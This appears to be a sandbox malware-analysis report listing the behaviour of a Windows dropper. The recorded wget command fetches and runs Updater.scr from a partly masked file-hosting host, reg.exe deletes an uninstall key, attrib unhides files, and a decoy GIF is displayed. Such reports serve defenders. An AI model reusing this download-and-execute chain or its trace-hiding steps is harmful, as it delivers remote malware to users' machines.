Technical Information
Commands executed (as recorded during analysis):
- '%TEMP%\Updater.scr'
- '%TEMP%\wget.exe' -c "http://dl.#####oxusercontent.com/u/62173443/Updater.scr" -O "%TEMP%\Updater.scr"
- '%TEMP%\wget.exe' /
- '%TEMP%\Updater.scr' (downloaded from the Internet)
- '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00" /f
- '<SYSTEM32>\attrib.exe' -s -h "%TEMP%\wget.exe"
- '<SYSTEM32>\attrib.exe' -s -h ""%TEMP%\get.cmd""
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\get.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %TEMP%\Birthday.gif
Files referenced under %TEMP%:
- %TEMP%\get.cmd
- %TEMP%\wget.exe
- %TEMP%\Updater.scr
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\Birthday.gif
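Second file list (all three paths also appear in the list above; the label saying what was done to them is missing from this copy):
- %TEMP%\$inst\2.tmp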
- %TEMP%\wget.exe
- %TEMP%\$inst\temp_0.tmp
Network activity (host name partly masked with ##### in the report):
- 'dl.#####oxusercontent.com':80
- dl.#####oxusercontent.com/u/62173443/Updater.scr
- DNS ASK dl.#####oxusercontent.com
Window classes referenced:
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'